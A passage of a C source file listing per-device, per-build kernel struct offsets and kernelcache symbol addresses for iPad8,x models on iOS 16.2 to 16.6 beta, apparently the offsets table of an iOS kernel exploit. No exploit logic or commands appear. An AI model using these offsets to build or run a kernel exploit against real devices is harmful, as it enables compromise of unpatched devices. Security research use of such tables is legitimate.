= 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a389288, .kernelcache__gPhysBase = 0xfffffff0079340e0, .kernelcache__gPhysSize = 0xfffffff0079340e0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079322b8, .kernelcache__perfmon_devices = 0xfffffff00a3c7500, .kernelcache__perfmon_dev_open = 0xfffffff007eedc8c, .kernelcache__ptov_table = 0xfffffff0078e7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3c6990, .kernelcache__vm_pages = 0xfffffff0078e3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3c6988, .kernelcache__vn_kqfilter = 0xfffffff007f3cad8, }, //16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad8,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a419ab0, .kernelcache__gPhysBase = 0xfffffff007944288, .kernelcache__gPhysSize = 0xfffffff007944288 + 0x8, .kernelcache__gVirtBase = 0xfffffff007942440, .kernelcache__perfmon_devices = 0xfffffff00a459530, .kernelcache__perfmon_dev_open = 0xfffffff007f0a434, .kernelcache__ptov_table = 0xfffffff0078f79a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a458910, .kernelcache__vm_pages = 0xfffffff0078f40f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078f6950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a458908, .kernelcache__vn_kqfilter = 0xfffffff007f58c44, }, // iPad8,9 16.2 { .kern_version = "Darwin Kernel Version 22.1.0: Thu Oct 6 19:33:53 PDT 2022; root:xnu-8792.42.7~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad8,9", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x530, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2a9150, .kernelcache__gPhysBase = 0xfffffff00784f9d8, .kernelcache__gPhysSize = 0xfffffff00784f9d8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784dbc0, .kernelcache__perfmon_devices = 0xfffffff00a2e4300, .kernelcache__perfmon_dev_open = 0xfffffff007ec279c, .kernelcache__ptov_table = 0xfffffff007803890, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2e3780, .kernelcache__vm_pages = 0xfffffff0078006c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007802850, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2e3778, .kernelcache__vn_kqfilter = 0xfffffff007f14d00, }, //16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad8,9", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad8,9", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad8,9", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad8,9", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad8,9", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a389288, .kernelcache__gPhysBase = 0xfffffff0079340e0, .kernelcache__gPhysSize = 0xfffffff0079340e0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079322b8, .kernelcache__perfmon_devices = 0xfffffff00a3c7500, .kernelcache__perfmon_dev_open = 0xfffffff007eedc8c, .kernelcache__ptov_table = 0xfffffff0078e7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3c6990, .kernelcache__vm_pages = 0xfffffff0078e3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3c6988, .kernelcache__vn_kqfilter = 0xfffffff007f3cad8, }, //16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad8,9", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a419ab0, .kernelcache__gPhysBase = 0xfffffff007944288, .kernelcache__gPhysSize = 0xfffffff007944288 + 0x8, .kernelcache__gVirtBase = 0xfffffff007942440, .kernelcache__perfmon_devices = 0xfffffff00a459530, .kernelcache__perfmon_dev_open = 0xfffffff007f0a434, .kernelcache__ptov_table = 0xfffffff0078f79a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a458910, .kernelcache__vm_pages = 0xfffffff0078f40f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078f6950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a458908, .kernelcache__vn_kqfilter = 0xfffffff007f58c44, }, // iPad8,10 16.2 { .kern_version = "Darwin Kernel Version 22.1.0: Thu Oct 6 19:33:53 PDT 2022; root:xnu-8792.42.7~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad8,10", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, 